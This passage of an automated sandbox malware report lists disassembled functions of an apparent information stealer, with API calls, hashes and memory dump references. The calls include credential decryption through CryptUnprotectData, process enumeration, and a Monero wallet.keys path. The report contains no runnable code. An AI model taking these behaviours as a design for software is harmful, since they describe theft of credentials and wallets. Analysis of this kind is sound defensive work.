                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 3^};$`v|v$aq$u3U$xm.?$zY5
                                • API String ID: 0-2992283585
                                • Opcode ID: fed33e208a51780b947a27befdc61830739d2b6ece479155ff2765c08d39fda2
                                • Instruction ID: dbc78e58250660be551adcd70bc1c994a96ea07c153c1b6d89c7450fdd51fa62
                                • Opcode Fuzzy Hash: fed33e208a51780b947a27befdc61830739d2b6ece479155ff2765c08d39fda2
                                • Instruction Fuzzy Hash: 55B22AF3A0C2109FE3086E2DDC8567AFBE5EF94320F1A493DEAC5C7744EA7558018696
                                Function 00FF6A10 Relevance: 9.1, Strings: 6, Instructions: 1595COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: !P(_$-B}G$/%;x$R*}$i7$m"~
                                • API String ID: 0-821411787
                                • Opcode ID: 010a6574bfb689c9372e75ee09cdc1517562e4d5eb5cf49defb64b2fea401e0a
                                • Instruction ID: fe2a866cd31f9c37fbf94b61916b35333d127658cd4925ca84b1fa314787547c
                                • Opcode Fuzzy Hash: 010a6574bfb689c9372e75ee09cdc1517562e4d5eb5cf49defb64b2fea401e0a
                                • Instruction Fuzzy Hash: C0B2F5F390C2049FE7046E2DEC8567ABBE9EF94320F1A493DEAC4D3744EA3558148697
                                Function 00FF4EF2 Relevance: 7.9, Strings: 5, Instructions: 1630COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: AbA$LMvw$ehu}$nuU$f[~
                                • API String ID: 0-3757762523
                                • Opcode ID: ec9feb3070a98e1357495f0b880e74a1510e9c8ab8193b4a0e60f85007f1f860
                                • Instruction ID: ec14168b2b80f211f08640fedbc98a5700c7c0c74ad7310a36dd3e018952a09e
                                • Opcode Fuzzy Hash: ec9feb3070a98e1357495f0b880e74a1510e9c8ab8193b4a0e60f85007f1f860
                                • Instruction Fuzzy Hash: 53B227F3A0C6049FE304AE2DEC8567AFBE5EF94320F1A893DE6C4C3744E93558058696
                                Function 00C3C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00C3C871
                                • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00C3C87C
                                • lstrcat.KERNEL32(?,00C50B46), ref: 00C3C943
                                • lstrcat.KERNEL32(?,00C50B47), ref: 00C3C957
                                • lstrcat.KERNEL32(?,00C50B4E), ref: 00C3C978
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$BinaryCryptStringlstrlen
                                • String ID:
                                • API String ID: 189259977-0
                                • Opcode ID: d46cc87b14b05618630190dcc774cd41ae2f954d66aab1ac3c172df59060d8ce
                                • Instruction ID: 209edd32ddd26877d9122c2758a04084483f6b48fb390c9d39b090e2c69315cc
                                • Opcode Fuzzy Hash: d46cc87b14b05618630190dcc774cd41ae2f954d66aab1ac3c172df59060d8ce
                                • Instruction Fuzzy Hash: ED415DB591421ADFDB10DF94DD89BFEB7B8BB88704F1441B8E509B6280D7705A88CF92
                                Function 00C37240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00C3724D
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C37254
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00C37281
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00C372A4
                                • LocalFree.KERNEL32(?), ref: 00C372AE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                • String ID:
                                • API String ID: 2609814428-0
                                • Opcode ID: d3cf2e5419f88daeb6a46e5f4f63505669ec6188253551036aa849663bac4870
                                • Instruction ID: 78bf64b4386e4890d85681ebd13a1b0fd44b6b079a9a40f6d0d85c1f47fdd8f4
                                • Opcode Fuzzy Hash: d3cf2e5419f88daeb6a46e5f4f63505669ec6188253551036aa849663bac4870
                                • Instruction Fuzzy Hash: C20140B5A40208BFEB14DBD4DD4AF9E7778AB44700F144154FB09BA2C0D670AA448B66
                                Function 00C49600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C4961E
                                • Process32First.KERNEL32(00C50ACA,00000128), ref: 00C49632
                                • Process32Next.KERNEL32(00C50ACA,00000128), ref: 00C49647
                                • StrCmpCA.SHLWAPI(?,00000000), ref: 00C4965C
                                • CloseHandle.KERNEL32(00C50ACA), ref: 00C4967A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                • String ID:
                                • API String ID: 420147892-0
                                • Opcode ID: 138af7f0259d7b807b0c172ae6034491190b03ae30a507a60d3698ef83280a1f
                                • Instruction ID: 0a03d126868c0abf6a5924f4a7feef271f0d74d1add40938adf6b6ff81020a65
                                • Opcode Fuzzy Hash: 138af7f0259d7b807b0c172ae6034491190b03ae30a507a60d3698ef83280a1f
                                • Instruction Fuzzy Hash: 36010C75A00218AFDB64DFA6DD48BEEB7F8FB48301F144199B909A6240D7749B84CF51
                                Function 00C48680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00C505B7), ref: 00C486CA
                                • Process32First.KERNEL32(?,00000128), ref: 00C486DE
                                • Process32Next.KERNEL32(?,00000128), ref: 00C486F3
                                  • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                  • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                  • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                  • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                • CloseHandle.KERNEL32(?), ref: 00C48761
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                • String ID:
                                • API String ID: 1066202413-0
                                • Opcode ID: 691856492f2f9075f8944520bed7a733ef792e2eb2a7b19e7d85a605ce5aed26
                                • Instruction ID: f285f9a0773b6932cc473a99fc1b3f5c4a7ec5d52a59d768def4321ab737bbf7
                                • Opcode Fuzzy Hash: 691856492f2f9075f8944520bed7a733ef792e2eb2a7b19e7d85a605ce5aed26
                                • Instruction Fuzzy Hash: AD314B71941218ABDB24EF55DC55FEEB778FB45700F1041A9F50AA21A0DB306A89CFA2
                                Function 00C48EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                Download Yara Rule
                                APIs
                                • CryptBinaryToStringA.CRYPT32(00000000,00C35184,40000001,00000000,00000000,?,00C35184), ref: 00C48EC0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptString
                                • String ID:
                                • API String ID: 80407269-0
                                • Opcode ID: a88f35e6e0106c877b1378969527d7dae8f8a0e4b9e13b7ce99ef4b875ceb554
                                • Instruction ID: 8760ac708f2ddf2c82227d93d8de90e33693bee95a0e885efb14d9215bd4b0f7
                                • Opcode Fuzzy Hash: a88f35e6e0106c877b1378969527d7dae8f8a0e4b9e13b7ce99ef4b875ceb554
                                • Instruction Fuzzy Hash: E5111C74200204BFDB04CFA5D884FAF33A9BF89700F149458F9198B250DB75ED89DB61
                                Function 00C39AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C34EEE,00000000,00000000), ref: 00C39AEF
                                • LocalAlloc.KERNEL32(00000040,?,?,?,00C34EEE,00000000,?), ref: 00C39B01
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C34EEE,00000000,00000000), ref: 00C39B2A
                                • LocalFree.KERNEL32(?,?,?,?,00C34EEE,00000000,?), ref: 00C39B3F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptLocalString$AllocFree
                                • String ID:
                                • API String ID: 4291131564-0
                                • Opcode ID: c1f169ab701c72cdcb8a2e00601244d2838eb2e2e0c37a03db03dfd5e7b25855
                                • Instruction ID: ac751f89cd04d213f82487a2b4db917d3cccc3f7119eb643b78c7756c37f8636
                                • Opcode Fuzzy Hash: c1f169ab701c72cdcb8a2e00601244d2838eb2e2e0c37a03db03dfd5e7b25855
                                • Instruction Fuzzy Hash: 6811A4B4240208EFEB14CF64DC95FAAB7B5FB89704F248058F9199B390C7B5AA41CB51
                                Function 00C47980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00C50E00,00000000,?), ref: 00C479B0
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C479B7
                                • GetLocalTime.KERNEL32(?,?,?,?,?,00C50E00,00000000,?), ref: 00C479C4
                                • wsprintfA.USER32 ref: 00C479F3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateLocalProcessTimewsprintf
                                • String ID:
                                • API String ID: 377395780-0
                                • Opcode ID: c304e89a678d7b8c3366babedaf38b2002c8d81b0b7d43b8bf9c3a47b49bf8cd
                                • Instruction ID: e1ad326ab419198135ed0330580746a4280350571a0e87a93e9889cd631b6514
                                • Opcode Fuzzy Hash: c304e89a678d7b8c3366babedaf38b2002c8d81b0b7d43b8bf9c3a47b49bf8cd
                                • Instruction Fuzzy Hash: F9112AB2904118ABCB14DFCADD45BBEB7F8FB4CB11F14425AF605A2280D3395944D7B1
                                Function 00C47A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,019FE850,00000000,?,00C50E10,00000000,?,00000000,00000000), ref: 00C47A63
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C47A6A
                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,019FE850,00000000,?,00C50E10,00000000,?,00000000,00000000,?), ref: 00C47A7D
                                • wsprintfA.USER32 ref: 00C47AB7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                • String ID:
                                • API String ID: 3317088062-0
                                • Opcode ID: 25db1f7e01b7a9f70788d7181557f72f4d1dc3826fa1e4fdb5683da452cea892
                                • Instruction ID: 071a9c1ccec66b07f00f42669cda62c20f75f6ef02cd405cd0550bd38b76e58b
                                • Opcode Fuzzy Hash: 25db1f7e01b7a9f70788d7181557f72f4d1dc3826fa1e4fdb5683da452cea892
                                • Instruction Fuzzy Hash: F6118EB1A45218EFEB20DB55DC49FA9B778FB44721F1043AAE91AA32C0C7741A84CF52
                                Function 01004337 Relevance: 4.9, Strings: 3, Instructions: 1137COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 2x|$?H_$V5<
                                • API String ID: 0-3609585474
